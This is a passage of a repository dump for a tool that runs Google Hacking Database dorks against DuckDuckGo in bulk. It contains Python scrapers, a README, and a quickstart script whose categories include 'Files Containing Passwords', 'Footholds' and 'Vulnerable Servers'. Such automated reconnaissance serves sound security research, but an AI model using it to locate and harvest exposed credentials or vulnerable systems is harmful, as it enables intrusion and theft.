args.dork.split(':')[0]+':'+'\\\"'+args.dork.split(':')[1]+'\\\"'\r\n\t\telse:\r\n\t\t\tdork = '\\\"'+args.dork+'\\\"'\r\n\telse:\r\n\t\tdork=args.dork # unless exact is specified requessts does NOT require encapsulating the search term in quotes\r\n\tmydict={'q':dork}\r\n\tbase_url = 'https://html.duckduckgo.com/html'\r\n\tget_request=requests.get(base_url,headers=headers,params=mydict)\r\n\tsoup = BeautifulSoup(get_request.text,'lxml')\r\n\t\r\n\t # if you only want 1 page of results back\r\n\tbase_results=soup.find_all('a',{'class':'result__a'})\r\n\tif len(base_results)==0: # something messed up if this is empty\r\n\t\tprint('Some sort of error has just occurred, this might be but is not limited to a throttle duckduckgo has imposed on you for scraping their engine')\r\n\t\tprint('Returning response now...')\r\n\t\tprint(soup)\r\n\t\tsys.exit(1)\r\n\r\n\tfor i in range(len(base_results)):\r\n\t\tresult_title = base_results[i].text\r\n\t\tresult_url = base_results[i].attrs['href']\r\n\t\tfirst_request.setdefault(result_url,[]).append(result_title)\r\n\r\n\tbase_text = soup.find_all('a',{'class':'result__snippet'})\r\n\tfor i in range(len(base_text)):\r\n\t\tresult_text= base_text[i].text\r\n\t\tfirst_request.setdefault(base_text[i].attrs['href'],[]).append(result_text)\r\n\tif not args.results:\r\n\t\targs.results=1 # if you goof and forget to supply num results \r\n\tif args.results <=1: # if the user wants only 1 page of results returned\r\n\t\tfor keys, values in first_request.items():\r\n\t\t\tprint(values[0])\r\n\t\t\tprint(keys)\r\n\t\t\tprint(values[1]+'\\n\\n')\r\n\t\t\r\n\t\r\n\telse: #if a user wants more than a single page of results\r\n\t\ttry:\r\n\r\n\t\t\tvqd=soup.find(\"input\",{'name':'vqd'}).attrs['value']\r\n\t\t\tq=soup.find(\"input\",{'name':'q'}).attrs['value']\r\n\t\t\ts=soup.find(\"input\",{'name':'s'}).attrs['value'] 
\r\n\t\t\tnextParams=''\r\n\t\t\tv='l'\r\n\t\t\to='json'\r\n\t\t\tdc=soup.find(\"input\",{'name':'dc'}).attrs['value'] # Initial Offset = (number of page results +1)+number of subsequent results per post\r\n\t\t\tpostParams = {'vqd':vqd,'q':dork,'s':s,'nextParams':'','v':'l','o':'json','dc':dc,'api':'/d.js'}\r\n\r\n\t\t\t\r\n\t\t\t#Make initial POST request and get back the blob of data we want \r\n\t\t\tfor i in range(args.results):\r\n\t\t\t\tsleep(1) # so we dont overload duckduckgo's garbo servers\r\n\r\n\t\t\t\tx=requests.post(postURL,headers=headers,data=postParams)\r\n\t\t\t\tresults = BeautifulSoup(x.text,'lxml')\r\n\t\t\t\tbase_results=results.find_all('a',{'class':'result__a'})\r\n\r\n\t\t\t\t# Update the global entry dict which is used for scenarios in which we have more than 1 page requested \r\n\t\t\t\tfor i in range(len(base_results)):\r\n\t\t\t\t\tresult_title = base_results[i].text\r\n\t\t\t\t\tresult_url = base_results[i].attrs['href']\r\n\t\t\t\t\tentry.setdefault(result_url,[]).append(result_title)\r\n\r\n\t\t\t\tbase_text = results.find_all('a',{'class':'result__snippet'})\r\n\t\t\t\tfor i in range(len(base_text)):\r\n\t\t\t\t\tresult_text= base_text[i].text\r\n\t\t\t\t\tentry.setdefault(base_text[i].attrs['href'],[]).append(result_text)\r\n\t\t\t\t\r\n\t\t\t\t#update our dict we generated with the first request to include results from the nth request \r\n\t\t\t\tfirst_request.update(entry)\r\n\r\n\t\t\t\t#update the postParams that allow us to POST again. Sorta repeating ourselves but not a better way to do this atm\r\n\t\t\t\tvqd=results.find(\"input\",{'name':'vqd'}).attrs['value']\r\n\t\t\t\ts=max([element.get('value') for element in results.find_all(\"input\",{'name':'s'})]) \r\n\t\t\t\tnextParams=''\r\n\t\t\t\tv='l'\r\n\t\t\t\to='json'\r\n\t\t\t\tdc=max([element.get('value') for element in results.find_all(\"input\",{'name':'dc'})])\r\n\t\t\t\tpostParams = {'vqd':vqd,'q':dork,'s':s,'nextParams':'','v':'l','o':'json','dc':dc,'api':'/d.js'} # update our parameters\r\n\t\texcept Exception as e:\r\n\t\t\tprint('''Unable to scroll for more pages. This could mean that your search returned only 1 page of results\r\n\tor that something is blocking this script from scrolling further. 
Recommended that you search the dork\r\n\tterm manually in a browser to verify this is not an error.\\n\\n''')\r\n\r\n\t\t\t# in the event of an error, print what we have\r\n\t\t\tprint(\"Returning first page of results now...\")\r\n\t\t\tfor keys, values in first_request.items():\r\n\t\t\t\tprint(values[0])\r\n\t\t\t\tprint(keys)\r\n\t\t\t\tprint(values[1]+'\\n\\n')\r\n\t\t\tsys.exit(1)\r\n\t\t\r\n\t\t# if everything goes OK, print all results back to the user\r\n\t\tfor keys, values in first_request.items():\r\n\t\t\tprint(values[0])\r\n\t\t\tprint(keys)\r\n\t\t\tprint(values[1]+'\\n\\n')\r\n\r\nif __name__ == '__main__':\r\n\trun=get(args.dork)\r\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.7419354915618896, "avg_line_length": 5.75, "blob_id": "4456bd82a502305ff5162243870ed552c889ad1c", "content_id": "805aab20f79db5be676e25504ff695006c5aee47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 31, "license_type": "no_license", "max_line_length": 8, "num_lines": 4, "path": "/requirements.txt", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "lxml\r\nrequests\r\nbs4\r\nselenium\r\n" }, { "alpha_fraction": 0.6750215888023376, "alphanum_fraction": 0.694900631904602, "avg_line_length": 25, "blob_id": "7abfc8471ce5e70e4bede8412ef417413db42ee2", "content_id": "ca0851f1d0a6dd51f3d4e72205da314bc82d2c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2314, "license_type": "no_license", "max_line_length": 158, "num_lines": 89, "path": "/quickstart.sh", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nset -eou pipefail\n\necho -ne 'Setting up ghdb... if the dorks folder contains files this step will be skipped. If you need to refresh dork files run the following: \n\\n\\t python3 ghdb_scraper.py -i\\n\\n'\n\nif [[ -z \"$(ls dorks)\" ]]; then\n\techo $(python3 ghdb_scraper.py -i) >&1\nfi\n\necho -ne 'Welcome to quickstart\\n'\n\n\necho -ne 'First please choose a category by typing in a number corresponding to the category\\n\n1: Footholds\n2: File Containing Usernames\n3: Sensitives Directories\n4: Web Server Detection\n5: Vulnerable Files\n6: Vulnerable Servers\n7: Error Messages\n8: File Containing Juicy Info\n9: File Containing Passwords\n10: Sensitive Online Shopping Info\n11: Network or Vulnerability Data\n12: Pages Containing Login Portals\n13: Various Online devices\n14: Advisories and Vulnerabilities\\n\nCategory: '\n\nread category\n\ncase \"$category\" in\n\t'1' )\n\tfile=\"dorks/footholds.dorks\"\t;;\n\t'2' )\n\tfile=\"dorks/files_containing_usernames.dorks\"\t;;\n\t'3' )\n\tfile=\"dorks/sensitive_directories.dorks\"\t;;\n\t'4' )\n\tfile=\"dorks/web_server_detection.dorks\"\t;;\n\t'5' )\n\tfile=\"dorks/vulnerable_files.dorks\"\t;;\n\t'6' )\n\tfile=\"dorks/vulnerable_servers.dorks\"\t;;\n\t'7' )\n\tfile=\"dorks/error_messages.dorks\"\t;;\n\t'8' )\n\tfile=\"dorks/files_containing_juicy_info.dorks\"\t;;\n\t'9' )\n\tfile=\"dorks/files_containing_passwords.dorks\"\t;;\n\t'10' )\n\tfile=\"dorks/sensitive_online_shopping_info.dorks\"\t;;\n\t'11' )\n\tfile=\"dorks/network_or_vulnerability_data.dorks\"\t;;\n\t'12' )\n\tfile=\"dorks/pages_containing_login_portals.dorks\"\t;;\n\t'13' )\n\tfile=\"dorks/various_online_devices.dorks\"\t;;\n\t'14' )\n\tfile=\"dorks/advisories_and_vulnerabilities.dorks\"\t;;\n\nesac\n\n\necho -ne 'Next, choose how many dorks from a category you would like to use. 
It must be a positive integer, or you can type all to use all dorks in the file\\n\nNumber of dorks: '\n\nread numdorks\n\necho \"You chose $numdorks Dorks\"\nfilelen=$(wc -l \"$file\" | awk -F ' ' '{print $1}')\n\n\nif [ \"$numdorks\" -le \"$filelen\" ] && [ \"$numdorks\" -ge 1 ]; then \n\thead -n \"$numdorks\" \"$file\" > temp\n\tcat temp\n\techo -ne \"$(while read line; do python3 dork_requests.py \"'$line'\"; done < temp)\\n\"; \n\trm temp\n\nelif [[ \"$numdorks\" < 1 ]]; then\n\techo 'must be a positive number'\n\t\nelse\n\techo 'using entire file of dorks'\n\techo -ne \"$(while read line; do python3 dork_requests.py \"'$line'\"; done < \"$file\")\\n\"\n\trm temp\nfi\n" }, { "alpha_fraction": 0.7635270357131958, "alphanum_fraction": 0.7675350904464722, "avg_line_length": 42.77193069458008, "blob_id": "056feafe78e0b5a27d46784d5c1ecdbc231c90bb", "content_id": "9cbb386b57822a1857744903da0e62c5ef4edefe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2495, "license_type": "no_license", "max_line_length": 269, "num_lines": 57, "path": "/README.md", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "# DuckDork\nAutomatic dorking for duckduckgo using the ghdb\n\n## Installation\n\nRunning this from your local machine requires python3 and several modules which can be installed using `pip3 install -r requirements.txt`\n\nIf you plan to use the selenium based version of this script, dork_selenium.py you also need the latest gecko driver which can be [found here](https://github.com/mozilla/geckodriver/releases)\n\nYou will then need to configure line 21 in `dork_selenium.py` to point to the path where you downloaded the driver\n\n## Usage\n\nYou have several options for running this script. \n\n* dork_requests.py\n\n* dork_selenium.py\n\nEach is described in detail (including their use case) below. Additionally there is a `quickstart.sh` script that leverages dork_requests.py and the Google Hacking Database (ghdb) for mass (albeit less precise) dorking \n\n### dork_requests.py\n\nIf you arent sure which to use, this is probably your best bet. The usage for the script is such: \n\n```\nusage: dork_requests.py [-h] dork [results] [exact]\n\npositional arguments:\n dork pass a full dork as an argument, if you want exact searches ie you want the dork to use quotation marks, pass the exact y. PLEASE NOTE THAT EXACT SEARCHES WITH A\n DORK OFTEN FAIL ie allintext:\"mark zuckerburg\" but exact searches ie \"mark zuckerberg\" do not\n results number of pages of results you want back. Default is 1 page\n exact usage of quotes for exact searching\n\noptional arguments:\n -h, --help show this help message and exit\n ```\n\nThus to search for something like `allintext:facebook` and 1 page of results you would use \n\n`python3 dork_requests.py allintext:facebook`\n\nIf you want to search for something that has whitespace such as `allintext:steve jobs` you need to encapsulate the query in single quotes ie \n\n`python3 dork_requests.py 'allintext:steve jobs'`\n\nExact queries, which force DuckDuckGo to only search exact matches on the query string can be enforced by passing the `y` argument. Please note that you *must* specify how many pages you want back. 
An exact search for a term like `allintext:apple` would thus look like \n\n`python3 dork_requests.py allintext:apple 1 y` which would be the eqivalent of typing \"allintext:apple\" into the DuckDuckGo search bar\n\n### dork_selenium.py\n\nThe same options as above but remember you need the gecko driver installed,for this reason it is recommended the dork_requests.py script be used\n\n### Quickstart.sh\n\nJust follow the on screen prompts!!\n" }, { "alpha_fraction": 0.7445194125175476, "alphanum_fraction": 0.7483136653900146, "avg_line_length": 36.63492202758789, "blob_id": "67c1430feac91dd767597c07954699e8c1c446d8", "content_id": "291cb7db79cd0da792db7fe1da53dc2585cfb933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2372, "license_type": "no_license", "max_line_length": 151, "num_lines": 63, "path": "/dork_selenium.py", "repo_name": "edrapac/DuckDork", "src_encoding": "UTF-8", "text": "from selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport urllib.parse\nimport argparse\nimport datetime\nfrom time import sleep\n\n# TODO - Add DNSDumpster scraping if the dork is a URL/domain based dork\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"dork\",help='pass a full dork as an argument, remember quotes need to be escaped, for example allintext:\\\\\"github.com\\\\\"',type=str)\nparser.add_argument(\"results\",help='number of pages of results you want back. Default is 1 page',const=1,nargs='?',type=int)\nargs = parser.parse_args()\n\nprint(\"Term searched for: %s\" %args.dork)\n\n\nencoded_dork = urllib.parse.quote_plus(args.dork)\nbase_url = \"https://duckduckgo.com/?q=%s&t=hc&va=u&ia=web\"%(encoded_dork)\n\nprint(\"Full URL used in search: %s\\n\" % base_url)\nprint(\"Searching, please be patient this may take a little while\\n\\n\")\n\nopts = Options()\nopts.set_headless()\nassert opts.headless\nbrowser = Firefox(executable_path=\"./geckodriver\",options=opts)\nbrowser.get(base_url)\nbrowser.implicitly_wait(5)\n\n#grabs first page search results so that DOM can detach\nresults = []\nbrowser.implicitly_wait(5)\ninitial_results= browser.find_elements_by_class_name('result')\nfor i in range(len(initial_results)):\n\tresults.append(initial_results[i].text)\n\nsleep(2)\n\n# Returns X amount of pages as specified with the results arg\ntry:\n\tfor i in range(args.results):\n\t\tbrowser.execute_script(\"document.getElementsByClassName('result--more__btn btn btn--full')[0].click()\") # Finds the More Results button and clicks it\n\t\tsleep(1.5)\n\t\ttemp_res = browser.find_elements_by_class_name('result')\n\t\tfor i in range(len(temp_res)):\n\t\t\tresults.append(temp_res[i].text)\t\n\t\nexcept Exception as e:\n\tprint('''Unable to scroll for more pages. This could mean that your search returned only 1 page of results\nor that something is blocking this script from scrolling further. Recommended that you search the dork\nterm manually in a browser to verify this is not an error.\\n\\n''')\nbrowser.close()\nnow = datetime.datetime.now()\nnow_file_fmt = now.strftime('%Y-%m-%d_%H.%M.%S')+\".log\"\nprint('RESULTS:\\n')\nresults_file = open(now_file_fmt,\"w\")\nfor i in range(len(results)):\n\tprint(results[i]+'\\n\\n')\n\tresults_file.write(results[i]+'\\n\\n')\nresults_file.close()\n\n" } ]
5
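Aside: the quickstart.sh, dork_requests.py and dork_selenium.py entries in the record above all hinge on URL-encoding a dork string and querying DuckDuckGo; dork_selenium.py shows the exact URL template. A minimal sketch of that encoding step follows, using only the standard library; the function name build_ddg_url is illustrative and not from the repository.

# Illustrative sketch (not part of the repository snapshot above).
# Mirrors the URL construction seen in dork_selenium.py, stdlib only.
import urllib.parse

def build_ddg_url(dork: str) -> str:
    """Return a DuckDuckGo search URL for a dork such as 'allintext:steve jobs'."""
    encoded = urllib.parse.quote_plus(dork)  # spaces become '+', ':' is percent-encoded
    return "https://duckduckgo.com/?q=%s&t=hc&va=u&ia=web" % encoded

if __name__ == "__main__":
    print(build_ddg_url("allintext:steve jobs"))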
ekbanasolutions/Nepali-NLP
https://github.com/ekbanasolutions/Nepali-NLP
1f6a5f24e83b0c2b7ef18395aed1c84f745ded0c
bdd27d9132f11232ae54be0c6336f86a2a475566
9e11ba774a6d7e80b2bb3cc6209d1f82ce2c1655
refs/heads/master
2020-04-25T02:30:45.324488
2019-08-29T05:07:16
2019-08-29T05:07:16
172,442,476
2
1
Apache-2.0
2019-02-25T05:50:15
2019-08-29T04:43:57
2019-08-29T05:07:17
Python
[ { "alpha_fraction": 0.6050724387168884, "alphanum_fraction": 0.6211180090904236, "avg_line_length": 30.68852424621582, "blob_id": "84c61ff89a69f478a3728c6843b9fba202ac7903", "content_id": "cdc23389561f7916de4dbb501278d094108e889e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2014, "license_type": "permissive", "max_line_length": 108, "num_lines": 61, "path": "/Nepali-News-Classification/train_classifier.py", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "import nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.naive_bayes import MultinomialNB\nimport pandas as pd\nfrom sklearn.metrics import accuracy_score\nimport pickle\n\nstopWords = set(nltk.corpus.stopwords.words('nepali'))\n# vect = TfidfVectorizer(tokenizer= lambda x: x.split(\" \"),\n# sublinear_tf=True, encoding='utf-8',\n# decode_error='ignore',\n# max_df=0.5,\n# min_df=10,\n# stop_words=stopWords)\n\nvect = TfidfVectorizer(sublinear_tf=True, encoding='utf-8',\n decode_error='ignore',stop_words=stopWords)\n\noutput_dict = {\n 0:\"auto\",\n 1:\"bank\",\n 2:\"blog\",\n 3:\"business\",\n 4:\"economy\",\n 5:\"education\",\n 6:\"employment\",\n 7:\"entertainment\",\n 8:\"interview\",\n 9:\"literature\",\n 10:\"national_news\",\n 11: \"opinion\",\n 12:\"sports\",\n 13: \"technology\",\n 14: \"tourism\",\n 15: \"world\"\n}\n\n\ntrainNews = pd.read_csv(\"./data/train.csv\")\ntestNews = pd.read_csv(\"./data/test.csv\")\nxTrain = trainNews['text']\nyTrain = trainNews['label']\n\ntfidf = vect.fit(xTrain.values.astype('U'))\nxTrainvect = vect.fit_transform(xTrain)\nyTrainvect = yTrain\nxTestvect = vect.transform(testNews['text'])\nyTestvect = testNews['label']\n\nmodel = MultinomialNB(alpha=0.01, fit_prior=True)\nmodel.fit(xTrainvect, yTrainvect)\n\nypred = model.predict(xTestvect)\nscore = accuracy_score(yTestvect, ypred)\nprint (\"Accuracy: \",score)\npickle.dump(model, open(\"/Nepali-NLP/Nepali-News-Classification/models/news_classifier_model.pickle\", 'wb'))\npickle.dump(tfidf, open(\"/Nepali-NLP/Nepali-News-Classification/models/news_vectorizer.pickle\", \"wb\"))\n####TEST#####\ntest = \"नेपालको छवि विगतको तुलनामा उच्च : मन्त्री ज्ञवाली\"\nyPred = model.predict(vect.transform([test]))\nprint (\"OUTPUT: \", output_dict[int(yPred)])" }, { "alpha_fraction": 0.5617740154266357, "alphanum_fraction": 0.5860612392425537, "avg_line_length": 22.700000762939453, "blob_id": "e679cfd0d758f4b61ce9d50e5b52bf4a285273b2", "content_id": "9875beb102c873f6c7e93ed022483f12073ca462", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "permissive", "max_line_length": 108, "num_lines": 40, "path": "/Nepali-News-Classification/news_classifier.py", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "import nltk\nimport pickle\n\nstopWords = set(nltk.corpus.stopwords.words('nepali'))\n\n\noutput_dict = {\n 0:\"auto\",\n 1:\"bank\",\n 2:\"blog\",\n 3:\"business\",\n 4:\"economy\",\n 5:\"education\",\n 6:\"employment\",\n 7:\"entertainment\",\n 8:\"interview\",\n 9:\"literature\",\n 10:\"national_news\",\n 11: \"opinion\",\n 12:\"sports\",\n 13: \"technology\",\n 14: \"tourism\",\n 15: \"world\"\n}\n\n\"\"\"\nLoad the trained model and vectorizer pickle\n\"\"\"\n\nmodel = pickle.load(open(\"Nepali-NLP/Nepali-News-Classification/models/news_classifier_model.pickle\", 'rb'))\nvectorizer = pickle.load( 
open(\"+-*9-+-----+\"\n \"+\"\n \"Nepali-NLP/Nepali-News-Classification/models/news_vectorizer.pickle\", \"rb\"))\n\n\"\"\"\npredict the classes for the text\n\"\"\"\ntest = \"नेपालको छवि विगतको तुलनामा उच्च : मन्त्री ज्ञवाली\"\nyPred = model.predict(vectorizer.transform([test]))\nprint (\"OUTPUT: \", output_dict[int(yPred)])" }, { "alpha_fraction": 0.5485380291938782, "alphanum_fraction": 0.6233918070793152, "avg_line_length": 29.5, "blob_id": "e22c3d19c5b61e4b94e04593fc4846e51d9cf4e8", "content_id": "a94d6d07b7724a33f879d95d4f8aeb4569ebe6c2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 855, "license_type": "permissive", "max_line_length": 128, "num_lines": 28, "path": "/Nepali-News-Classification/README.md", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "Algorithm used: MultinomialNB<br>\nAccuracy: 0.8713984539704849<br>\n<br>\nOur dataset has data for each category:<br>\nauto: 82<br>\nbank: 310<br>\nblog: 187<br>\nbusiness: 123<br>\neconomy: 1058<br>\neducation: 75<br>\nemployment: 132<br>\nentertainment: 1046<br>\ninterview: 78<br>\nliterature: 14<br>\nnational_news: 6591<br>\nopinion: 502<br>\nsports: 2041<br>\ntechnology: 92<br>\ntourism: 189<br>\nworld: 187<br>\n<br>\nsample train data and sample test data is provided in the data folder. You can add more data by scraping some news websites.<br>\n<br>\n# To train your classifier\nrun train_classifier.py\n<br>\n# To predict the classes\nrun news_classifier.py which uses the trained models saved from train_classifier.py. \n" }, { "alpha_fraction": 0.8409090638160706, "alphanum_fraction": 0.8409090638160706, "avg_line_length": 43.5, "blob_id": "312594a099c1dffcafbf18dacc67476e3cf4cf3c", "content_id": "1759ebbe2c7103a9bcf98046593aac913dc666a2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 88, "license_type": "permissive", "max_line_length": 49, "num_lines": 2, "path": "/Nepali-Text-similarity/README.md", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "# Nepali Text Similarity Using Jaccard Similarity\nCheck the similarity between two text." 
}, { "alpha_fraction": 0.5309523940086365, "alphanum_fraction": 0.5476190447807312, "avg_line_length": 29, "blob_id": "f172b6b0bd75fe16347b3ca298454dd771cec41a", "content_id": "e90b5af33af2c6bb740141d6ba7ef5f5897c739b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "permissive", "max_line_length": 84, "num_lines": 42, "path": "/Nepali-Text-similarity/nepali_text_similarity.py", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "import re\nimport string\n\nexclude = set(string.punctuation)\n\ndef pre_pro(text):\n \"\"\"\n cleaning the text\n \"\"\"\n text = text.lower()\n text = re.sub( '\\s+', ' ', text ).strip()\n text = re.sub( '&\\w*;', ' ', text ) #eg: &nbsp;\n text = re.sub( '#\\d+;', ' ', text ) #eg: #1223;\n text = re.sub( '&#\\d+;', ' ', text ) #eg: &#fffee;\n text = re.sub( '<\\w.*>', ' ', text ) #eg: <html>\n text = ''.join(ch for ch in text if ch not in exclude)\n return text\n\n\ndef jaccard(set_a, set_b):\n \"\"\"\n calculate the distance between two text\n Jaccard Similairty: J(a,b) = |A ∩ B|/|A ∪ B|.\n \"\"\"\n intersection = set_a & set_b\n union = set_a | set_b\n if len(union) > 0:\n return len(intersection) / len(union)\n else:\n return 0\n\ndef text_similarity(text1,text2):\n text1_set = set([x for x in text1.lower().split()])\n text2_set = set([x for x in text2.lower().split()])\n jaccard_similarity = jaccard(text1_set, text2_set)\n return int(jaccard_similarity*100)\n\ntext1 = \"\"\" मलाई स्याउ खान मन छ । एप्पल स्वास्थ्य को लागी धेरै राम्रो छ\"\"\"\ntext2 = \"\"\"मलाई धेरै नै स्याउ खान मन पर्छ । एप्पल स्वास्थ्य को लागी धेरै राम्रो छ\"\"\"\n\nsim_score = text_similarity(text1,text2)\nprint (\"The two documents are \"+str(sim_score)+\"% similar\")\n" }, { "alpha_fraction": 0.7954545617103577, "alphanum_fraction": 0.7954545617103577, "avg_line_length": 21, "blob_id": "4f3314b7f2e214a1019ed4f21947bc3b2a18f419", "content_id": "4c10ed8d7dc18c38138735bddc93c1d006df7748", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "permissive", "max_line_length": 30, "num_lines": 2, "path": "/README.md", "repo_name": "ekbanasolutions/Nepali-NLP", "src_encoding": "UTF-8", "text": "# Nepali-NLP\nNLP stuffs for Nepali language\n" } ]
6
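Aside: nepali_text_similarity.py in the record above computes Jaccard similarity over whitespace tokens, J(a, b) = |A ∩ B| / |A ∪ B|, reported as a percentage. A compact, self-contained sketch of the same computation; the identifiers and the sample strings here are illustrative, not taken from the file.

# Illustrative sketch (not part of the repository snapshot above).
def jaccard_percent(text1: str, text2: str) -> int:
    """Jaccard similarity over lower-cased word sets, returned as a whole percentage."""
    a, b = set(text1.lower().split()), set(text2.lower().split())
    union = a | b
    return int(100 * len(a & b) / len(union)) if union else 0

print(jaccard_percent("red apple", "red ripe apple"))  # 66: 2 shared words out of 3 distinct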
sronen71/ml-challenge
https://github.com/sronen71/ml-challenge
377f289a329a259e51dbb1f1d4de7735f92bf421
ffd46252128642b47db005e37883278ea94ff43c
982a9eb2a0b0b516fa7ee9f0a201f989c196b1df
refs/heads/main
2023-06-25T00:51:45.715647
2021-07-26T08:58:21
2021-07-26T08:58:21
389,222,187
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6150442361831665, "alphanum_fraction": 0.627212405204773, "avg_line_length": 31.071428298950195, "blob_id": "0fab5160efbc8c58395e7557b7b0f0365c7a539a", "content_id": "f8d2eb7eb5b1aad1173f7c2447672b6747c1e64e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 904, "license_type": "no_license", "max_line_length": 120, "num_lines": 28, "path": "/kinase.py", "repo_name": "sronen71/ml-challenge", "src_encoding": "UTF-8", "text": "\nimport pandas as pd\nfrom rdkit import Chem\nfrom rdkit.Chem.Draw import IPythonConsole\n\ndef smiles_tokenizer(smi):\n \"\"\" \n Tokenize a SMILES string representation of a molecule\n Returns a list of tokens in SMILES vocabulary\n \"\"\"\n import re\n pattern = \"(\\[[^\\]]+]|Br?|Cl?|N|O|S|P|F|I|b|c|n|o|s|p|\\(|\\)|\\.|=|#|-|\\+|\\\\\\\\|\\/|:|~|@|\\?|>|\\*|\\$|\\%[0-9]{2}|[0-9])\"\n regex = re.compile(pattern)\n tokens = [token for token in regex.findall(smi)]\n assert smi == ''.join(tokens)\n return tokens\n\n\ndef main():\n df = pd.read_csv('./kinase_JAK.csv')\n print(df.head())\n print(df.groupby(['measurement_type']).count())\n\ndef get_mol(smi):\n #IPythonConsole.molSize = (400, 300)\n #IPythonConsole.ipython_useSVG=True\n # Chem.MolFromSmiles returns a Chem.Mol object, which rdkit automatically visualizes in a jupyter notebook\n mol= Chem.MolFromSmiles(smi)\n return mol\n\n\n\n\n\n" } ]
1
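Aside: kinase.py in the record above tokenizes SMILES strings with a regular expression before any modelling. Below is a small usage sketch with a functionally equivalent pattern rewritten as a raw string; the example molecules (ethanol "CCO", benzene "c1ccccc1") are illustrative and not from the dataset.

# Illustrative sketch (not part of the repository snapshot above).
import re

# Same token alternatives as kinase.py's smiles_tokenizer, written as a raw string.
SMILES_PATTERN = (r"(\[[^\]]+]|Br?|Cl?|N|O|S|P|F|I|b|c|n|o|s|p|\(|\)|\.|=|#|-|\+|"
                  r"\\|/|:|~|@|\?|>|\*|\$|%[0-9]{2}|[0-9])")

def tokenize(smi: str) -> list:
    tokens = re.findall(SMILES_PATTERN, smi)
    assert smi == "".join(tokens)  # sanity check, as in kinase.py
    return tokens

print(tokenize("CCO"))        # ['C', 'C', 'O']
print(tokenize("c1ccccc1"))   # ['c', '1', 'c', 'c', 'c', 'c', 'c', '1']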
mxzgit/Sklearn-ML
https://github.com/mxzgit/Sklearn-ML
9e65446701e787a964e7fd87206be9b721a13a86
1994cd8b5c42553f0b952e0ac9c0ef3b50385463
6cb6da651e1837d64689d3a69136f8db3073a1dd
refs/heads/master
2020-06-03T21:02:08.879407
2019-07-22T15:02:54
2019-07-22T15:02:54
191,729,905
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6056337952613831, "alphanum_fraction": 0.6619718074798584, "avg_line_length": 35, "blob_id": "66363f8804578096b16bf0a8c20d5ded87c8d89e", "content_id": "d3d5fbd401c73420372c1b7c5ef59f2bea4b1538", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 71, "license_type": "no_license", "max_line_length": 50, "num_lines": 2, "path": "/challenge/functions.py", "repo_name": "mxzgit/Sklearn-ML", "src_encoding": "UTF-8", "text": "def cell_null(data):\n return data.isnull().sum()/data.shape[0] * 100" }, { "alpha_fraction": 0.5740086436271667, "alphanum_fraction": 0.58460932970047, "avg_line_length": 27.93181800842285, "blob_id": "5454e33b684fce6f354c3dcd7824b08dc6f1b123", "content_id": "dbfa46032af4c888b6a12360c9a28cbde7dd5b6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2547, "license_type": "no_license", "max_line_length": 81, "num_lines": 88, "path": "/Models/LinearSVC.py", "repo_name": "mxzgit/Sklearn-ML", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nfrom sklearn import svm \nfrom sklearn.metrics import accuracy_score\nfrom collections import Counter\n\ndef make_Dictionary(root_dir):\n\n \"\"\"[summary]\n \n Arguments:\n root_dir {string} -- directory of emails\n \n Returns:\n dic -- dictinary of most 3000 comon words and their count repetition\n \"\"\"\n \n all_words = []\n emails = [os.path.join(root_dir,f) for f in os.listdir(root_dir)]\n for email in emails:\n with open(email) as m:\n for line in m:\n words = line.split()\n all_words += words\n\n dictionary = Counter(all_words)\n list_to_remove = list(dictionary)\n\n for item in list_to_remove:\n if item.isalpha() == False:\n del dictionary[item]\n elif len(item) == 1:\n del dictionary[item]\n\n dictionary = dictionary.most_common(3000)\n\n return dictionary\n\n\ndef extract_feature(mail_dir):\n files = [os.path.join(mail_dir,fi) for fi in os.listdir(mail_dir)]\n features_matrix = np.zeroes((len(files),3000))\n train_labels = np.zeroes(len(files))\n count = 0\n docID = 0\n for fil in files:\n with open(fil) as fi:\n for i,line in enumerate(fi):\n if i ==2:\n words = line.split()\n for word in word:\n wordID = 0\n for i,d in enumerate(dictionary):\n if d[0] == word:\n wordID = i\n features_matrix[docID,wordID] = words.count(word)\n \n train_labels[docID] = 0\n filepathTokens = fil.split('/')\n lastToken = filepathTokens[len(filepathTokens) - 1]\n if lastToken.startswith(\"spmsg\"):\n train_labels[docID] = 1\n count += 1\n docID += 1\n return features_matrix, train_labels\n\n\nTRAIN_DIR = \"../Data/train-mails\"\nTEST_DIR = \"../Data/test-mails\"\n\ndictionary = 